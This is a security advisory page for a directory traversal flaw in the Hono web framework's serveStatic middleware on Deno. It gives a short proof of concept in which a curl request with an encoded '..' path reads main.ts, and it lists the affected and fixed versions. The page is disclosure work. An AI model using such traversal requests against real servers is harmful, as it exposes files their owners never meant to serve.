[NPM:GHSA-3MPF-RCC7-5347] Hono vulnerable to Restricted Directory Traversal in serveStatic with deno

  1. Home
  2. Security Advisories
  3. NPM
  4. NPM:GHSA-3MPF-RCC7-5347
Severity Moderate
Affected Packages 1
Fixed Packages 1
CVEs 1
Info Packages References Vulnerabilities

Summary

When using serveStatic with deno, it is possible to directory traverse where main.ts is located.

My environment is configured as per this tutorial
https://hono.dev/getting-started/deno

PoC

bash
$ tree
.
├── deno.json
├── deno.lock
├── main.ts
├── README.md
└── static
└── a.txt

source

```jsx
import { Hono } from 'https://deno.land/x/hono@v4.2.6/mod.ts'
import { serveStatic } from 'https://deno.land/x/hono@v4.2.6/middleware.ts'

const app = new Hono()
app.use('/static/*', serveStatic({ root: './' }))

Deno.serve(app.fetch)
```

request

bash
curl localhost:8000/static/%2e%2e/main.ts

response is content of main.ts

Impact

Unexpected files are retrieved.

Package Affected Version
pkg:npm/hono < 4.2.7
Package Fixed Version
pkg:npm/hono = 4.2.7
ID
NPM:GHSA-3MPF-RCC7-5347
Severity
moderate
URL
https://github.com/advisories/GHSA-3mpf-rcc7-5347
Published
2024-04-23T16:20:49
(3 months ago)
Modified
2024-04-23T16:20:50
(3 months ago)
Rights
NPM Security Team
Type Package URL Namespace Name / Product Version Distribution / Platform Arch Patch / Fix
Affected pkg:npm/hono hono < 4.2.7
Fixed pkg:npm/hono hono = 4.2.7
# CVE Description CVSS EPSS EPSS Trend (30 days) Affected Products Weaknesses Security Advisories Exploits PoC Pubblication Date Modification Date
# CVE Description CVSS EPSS EPSS Trend (30 days) Affected Products Weaknesses Security Advisories PoC Pubblication Date Modification Date